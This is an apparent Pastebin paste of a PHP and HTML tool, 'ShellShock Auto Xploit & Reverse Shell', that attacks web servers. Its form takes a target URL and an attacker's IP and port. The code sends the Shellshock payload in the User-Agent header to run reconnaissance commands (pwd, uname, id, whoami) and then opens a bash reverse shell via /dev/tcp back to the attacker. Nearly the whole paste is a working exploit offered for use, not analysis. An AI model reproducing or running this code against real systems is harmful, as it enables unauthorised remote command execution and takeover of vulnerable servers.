AgusSR

ShellShock Auto Xploit & Reverse Shell

Jun 2nd, 2016
880
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <h1>ShellShock Auto Anu by IndoXploit</h1>
  3. <form method="post">
  4. Target: <br><input type="text" name="url" style="width: 400px; margin: 10px auto; " height="10" placeholder="http://www.target.com/"><br>
  5. IP VPSmu: <br><input type="text" name="ip" style="width: 400px; margin: 10px auto; " height="10" placeholder="127.0.0.1"><br>
  6. PORT Listening: <br><input type="text" name="port" style="width: 400px; margin: 10px auto; " height="10" placeholder="1337"><br>
  7. <input type="submit" name="go" style="width: 400px; margin: 10px auto; " value="test">
  8. </form>
  9. </html>
  10. <?php
  11. // indoxploit - evoo
  12. function pwn($site,$cmd) {
  13.     $useragent =  "() { :; }; echo; /bin/$cmd";
  14.     $ch = curl_init($site);
  15.           curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  16.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  17.     $postResult = curl_exec($ch);
  18.     return $postResult;
  19. }
  20. $url = $_POST['url'];
  21. $go = $_POST['go'];
  22. $ip = $_POST['ip'];
  23. $port = $_POST['port'];
  24. if(isset($go)) {
  25.     echo "<pre>";
  26.     echo "=> $url<br>";
  27.     echo "pwd: ". pwn($url, "pwd") ."<br>";
  28.     echo "uname -a: ". pwn($url, "uname -a") . "<br>";
  29.     echo "id: ". pwn($url, "bash -c 'id'") . "<br>";
  30.     echo "whoami: ". pwn($url, "bash -c 'whoami'") . "<br>";
  31.     echo pwn($url, 'bash -i >& /dev/tcp/'.$ip.'/'.$port.' 0>&1') . "<br>";
  32.     echo "[ auto anu selesaiii bossqq ]<br><br>";
  33.     echo "</pre>";
  34. }
  35. ?>
RAW Paste Data